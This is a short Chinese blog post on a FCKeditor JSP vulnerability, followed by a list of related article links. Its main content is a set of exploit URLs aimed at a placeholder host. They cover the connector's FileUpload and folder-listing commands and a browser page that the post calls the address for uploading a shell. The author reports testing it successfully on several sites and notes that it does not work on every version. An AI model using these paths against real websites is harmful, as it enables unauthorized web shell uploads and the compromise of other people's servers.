FCKeditor JSP版漏洞

程序员文章站 2022-07-10 12:54:39

FCKeditor的JSP版漏洞 http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F ... 09-04-20...

fckeditor的jsp版漏洞

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?command=fileupload&type=image&currentfolder=%2f

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?command=getfoldersandfiles&type=image&currentfolder=%2f
上传shell的地址:
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?type=image&connector=connectors/jsp/connector
跟版本有关系.并不是百分百成功. 测试成功几个站.
不能通杀.很遗憾.

上一篇： mysql 读取文件的几种方式及应用

下一篇： Spring学习手札（三）理解IoC 拯救不开心

FCKeditor JSP版漏洞

Win10预览补丁发布：修复可损坏NTFS格式磁盘漏洞 21322版本以上不受影响

NVIDIA显卡驱动曝出5个高危漏洞：速升级最新431.60版本

JSP实现计算器功能（网页版）

苹果发布iOS 13新测试版：修复系统漏洞

JSP过滤器防止Xss漏洞的实现方法(分享)

Python写的Discuz7.2版faq.php注入漏洞工具

百度分页效果之纯jsp版

Adobe Flash Player 19.0.0.185正式版更新下载:修复不少漏洞

iPhone 13最大漏洞修复！苹果推送iOS 15.0.1版本：能用手表解锁了

php5版本年底停更，六成站长网站涉及安全漏洞